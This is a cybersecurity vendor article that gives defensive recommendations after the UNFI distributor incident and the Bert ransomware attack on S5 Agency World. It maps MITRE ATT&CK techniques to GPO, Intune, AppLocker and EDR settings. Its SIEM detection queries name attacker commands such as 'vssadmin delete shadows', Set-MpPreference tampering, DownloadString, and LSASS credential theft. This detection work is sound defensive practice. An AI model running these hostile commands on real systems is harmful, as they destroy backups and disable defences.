Filter articles

General 16.06.2025

UNFI & S5 Agency World: Technical Reccomendations

Author: Nick Harris, CISO in Residence, Assured

Whole Foods faces supply chain disruption after cyber incident at distributor UNFI

Assured’s vCISO suggests:

1. M1018 – User Account Management. Eliminate persistent or overprivileged third-party accounts integrated into supply systems.

  • Disable interactive logon for vendor accounts: 
    • GPO Path:
Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment
Setting: Deny log on locally
Value: <org> integration service accounts
  • Automatically expire dormant third-party accounts: 
    • net user <org>_sync /expires:06/30/2025

2. M1026 – Privileged Account Management. Harden and contain elevated permissions used by third-party integrations:

  • Constrain logon times for integration accounts: 
      • net user <org>_sync /times:M-F,06:00-20:00
  • Limit logon from specific IPs only (via Windows Firewall with Advanced Security): 
      • GPO Path:
Computer Configuration > Windows Settings > Security Settings > Windows Firewall with Advanced Security > Inbound Rules
Rule: Allow inbound traffic only from <org> IP ranges to port 443 (HTTPS)

3. M1047 – Audits. Track all actions taken by supply chain-linked service accounts.

  • Enable auditing of service account logon attempts: 
      • Intune Settings Catalog:
Audit Logon Events → Configure "Success" and "Failure"
  • Include command-line in process creation auditing: 
      • Intune Settings Catalog:
Setting: "Include command line in process creation events"
Value: Enabled

4. M1042 – Disable or Remove Feature or Program. Restrict ability of compromised third-party accounts to execute arbitrary tools.:

  • Set PowerShell policy to “AllSigned”: 
      • Intune > Device Configuration Profile > PowerShell Execution Policy
Value: AllSigned
  • Block command-line tools for third-party accounts via AppLocker: 
      • Rule: Deny > User: <org>_sync > Path: C:\Windows\System32\cmd.exe

5. M1038 – Execution Prevention. Prevent script execution from temp directories used in supply chain APIs or tooling:

  • Block scripts from %TEMP% for vendor accounts: 
        • Intune > Device Configuration Profile > PowerShell Execution Policy
Value: AllSigned
  • Disable Office macros for shared Excel-based integration: 
        • Registry:
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security]
"VBAWarnings"=dword:00000004

6. M1032 – Multi-factor Authentication. Protect integration dashboards and portals exposed to UNFI teams:

  • Enforce MFA for all vendor identities: 
        • Conditional Access Policy:
Assign to: Group “UNFI_Accounts”
Control: Require MFA
  • Block legacy auth methods (POP, IMAP, etc): 
        • Conditional Access → Client App Conditions → Block legacy authentication clients

S5 (Port) Agency World: Ransomware Breach:

Assured’s vCISO suggests:

Even with their infancy, we’ve looked into Bert’s TTPs and IOCs so we can provide advice on monitoring and protection measures, of which we have included some below. We mapped Bert’s TTPs to MITRE and generated this set of tactical guidance to clients to help them protect themselves from a similar attack.

ID Technique Description Controls Configurations (SIEM/EDR/MDM)
T1059 Command and Scripting Interpreter Uses PowerShell, cmd, and WScript for execution and payload delivery Monitor and block suspicious script execution SIEM: spl
index=windows EventCode=4104 (Message=”*Invoke*” OR Message=”*DownloadString*” OR Message=”*Base64*” OR Message=”*FromBase64String*”)
EDR: ASR Rule 3b576869-a4ec-4529-8536-b80a7769e899 to block Office apps from creating child processes
MDM: Use AppLocker to block untrusted script interpreters (e.g., PowerShell, WScript, cscript)
T1562.001 Impair Defenses: Disable or Modify Tools Disables AV/EDR with Set-MpPreference, sc stop, or registry edits Detect and prevent security tool tampering SIEM: spl
index=windows EventCode=4688 (CommandLine=”*Set-MpPreference*” OR CommandLine=”*Add-MpPreference*”)
EDR: Tamper Protection = EnabledReal-time Protection = On
MDM: Compliance policy to require EDR ATP risk = “Low”; enforce EDR Real-time Protection
T1070.004 Indicator Removal: File Deletion Deletes Windows event logs and backups using wevtutil, vssadmin, or bcdedit Monitor for use of destructive utilities SIEM: spl
index=windows (Image=”*vssadmin.exe*” AND CommandLine=”*delete shadows*”)
EDR: Alert on vssadmin, bcdedit, wevtutil usage via device timeline
MDM: Enforce BitLocker, prevent backup deletion through policies
T1486 Data Encrypted for Impact Ransomware payload encrypts data on disk Detect encryption behavior; isolate host quickly SIEM: Monitor mass file renames or modifications; high entropy in files
EDR: Trigger automatic isolation on ransomware detection
MDM/hardening: Trigger auto-remediation or quarantine via EDR ATP risk signal
T1027 Obfuscated Files or Information Base64 and other encoding used to obfuscate scripts Detect obfuscation patterns in scripting SIEM: Same query as T1059 above (Base64 indicators)
EDR: ASR Rule be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 to block script content from email/webmail
MDM/hardening: Block unsigned or untrusted scripts via Device Restriction profiles
T1055 Process Injection Injects into legitimate processes to evade detection and escalate privileges Monitor for parent-child anomalies SIEM: Flag unusual process chains (e.g., Office → PowerShell)
EDR: EDR alerting for LSASS or memory access manipulation
ASR Rule: d4f940ab-401b-4efc-aadc-ad5f3c50688a to block credential theft from LSASS
MDM/hardening: Require EDR onboarding; restrict registry access to LSASS
T1047 Windows Management Instrumentation (WMI) Executes scripts and commands remotely for lateral movement Detect non-standard WMI usage SIEM: Flag wmic processes launched by non-admins or scripts
EDR: Alert on lateral WMI execution in device timeline
MDM/hardening: Control WMI usage via controlled folder access and AppLocker rules
T1547.001 Registry Run Keys / Startup Folder Persistence via Run key or Startup folder Monitor registry modifications for persistence SIEM: spl
index=windows (RegistryKey=”*\\Run*” OR RegistryKey=”*\\RunOnce*”)
EDR: Alert on new autoruns
MDM/hardening: Disable legacy autorun functionality in system settings
T1218 Signed Binary Proxy Execution Uses trusted signed tools like rundll32.exe, regsvr32.exe for evasion Monitor use of signed Windows binaries for unusual activity SIEM: Detect use of LOLBins like regsvr32.exe, rundll32.exe outside of baseline
EDR: Enable detection for Living-Off-the-Land binaries
MDM/hardening: Restrict execution via AppLocker or WDAC policies
T1053.005 Scheduled Task Schedules tasks to maintain persistence or execute payloads Detect creation of suspicious scheduled tasks SIEM: Monitor Task Scheduler logs or schtasks command usage
EDR: Alert on anomalous scheduled tasks
MDM/hardening: Monitor and block via AppLocker and Task Scheduler policy settings
T1036 Masquerading Payloads may imitate trusted processes or have misleading file names Detect unusual parent-child process and image path anomalies SIEM: Alert on processes executing from unusual paths (e.g., %AppData%, %Temp%)
EDR: Enable warnings for unexpected binary locations
MDM/hardening: Block unsigned binaries from user-writable directories

Topics

Latest articles

Interviews 10.06.2025

Interview: Professor Dame Wendy Hall

With a career spanning decades at the forefront of artificial intelligence and data science, Professor Dame Wendy Hall has a lot to say about how organisations are integrating generative AI into cyber intelligence workflows

Read more

Be an insider. Sign up now!